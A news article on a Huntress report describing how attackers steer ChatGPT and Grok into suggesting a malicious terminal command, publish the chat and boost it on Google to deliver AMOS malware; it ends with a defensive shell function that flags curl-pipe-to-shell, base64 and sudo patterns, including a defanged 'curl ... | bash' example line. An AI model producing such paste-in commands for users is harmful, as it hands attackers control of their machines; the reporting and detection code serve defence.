Hackers are manipulating AI chatbots like ChatGPT and Grok to trick users into installing malware via search results. Learn how these dangerous AI prompt attacks work.
I’ve been tracking the collision course between cutting-edge AI and old-school fraud since I first reported on the vulnerabilities of agentic browsers earlier this year. Now a worrying new convergence has emerged: hackers are manipulating AI prompts to plant dangerous commands directly into Google search results. When unsuspecting users follow these instructions, they inadvertently hand attackers the keys to their systems, allowing them to install malware.
This warning comes from a recent report by the detection-and-response firm Huntress, which outlines a clever and alarming methodology. First, a threat actor steers a conversation with an AI assistant toward a mundane tech topic, tricking the AI into suggesting a specific code snippet to paste into a computer’s terminal. The hacker then makes this chat log public and pays to boost its visibility on Google, so anyone searching for that specific term encounters the malicious instructions near the top of the first results page.
Huntress put both ChatGPT and Grok to the test after tracing a Mac-specific data-exfiltration attack, known as AMOS, back to a simple Google search. In that instance, a user trying to “clear disk space on Mac” clicked a sponsored ChatGPT link. Lacking the technical expertise to recognize the code as hostile, they executed the command, and that single action allowed the attackers to deploy the AMOS malware. Huntress’s testers confirmed that both major chatbots could be manipulated to replicate this exact attack vector.
As Huntress notes, the “evil genius” here lies in how effectively this method sidesteps the traditional red flags we’ve been trained to spot: there is no file to download, no suspicious executable to install, and no obviously shady website to visit. The victim simply has to trust Google and ChatGPT, two platforms they likely use daily or hear about constantly. Because users are primed to trust these sources, their guard is down. Disturbingly, even after Huntress published its findings, the link to the compromised ChatGPT conversation remained active on Google for at least another half-day.
This development arrives at a tumultuous moment for both AI platforms. Grok is currently facing backlash for its sycophantic behavior toward Elon Musk, while OpenAI’s ChatGPT is fighting to keep pace with intensifying competition. It remains unclear whether this exploit extends to other chatbots, so I strongly advise exercising extreme caution. Beyond standard cybersecurity hygiene, adopt a new rule: never paste code into your command terminal or browser URL bar unless you are absolutely certain of what it does.
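That rule can be made a habit. As a rough illustration (this is my own sketch, not a tool from the Huntress report, and the patterns and placeholder URL are illustrative only), a tiny shell function can surface the hallmarks of these attack one-liners before you run anything: piping a remote download straight into a shell, base64 obfuscation, or requests for elevated privileges.

```shell
# check_cmd: print warnings for common red-flag patterns in a command
# string BEFORE you paste it into a terminal. Illustrative, not exhaustive.
check_cmd() {
    cmd="$1"
    found=0
    # Downloads a script from the internet and executes it immediately
    case "$cmd" in
        *curl*'|'*sh*|*wget*'|'*sh*)
            echo "WARNING: pipes a remote download straight into a shell"
            found=1 ;;
    esac
    # Base64 is a common way to hide what a payload actually does
    case "$cmd" in
        *base64*)
            echo "WARNING: uses base64, a common obfuscation trick"
            found=1 ;;
    esac
    # Asking for admin rights or scripting the OS deserves scrutiny
    case "$cmd" in
        *sudo*|*osascript*)
            echo "WARNING: requests admin rights or scripts the OS"
            found=1 ;;
    esac
    if [ "$found" -eq 0 ]; then
        echo "No obvious red flags -- still read it line by line first."
    fi
}

# Example: the curl-pipe-to-shell shape seen in these attacks (defanged URL)
check_cmd 'curl -fsSL https://example.invalid/fix.sh | bash'
```

A check like this catches only the crudest cases; the real defense is the habit itself of pausing to read any command a chatbot or search result hands you.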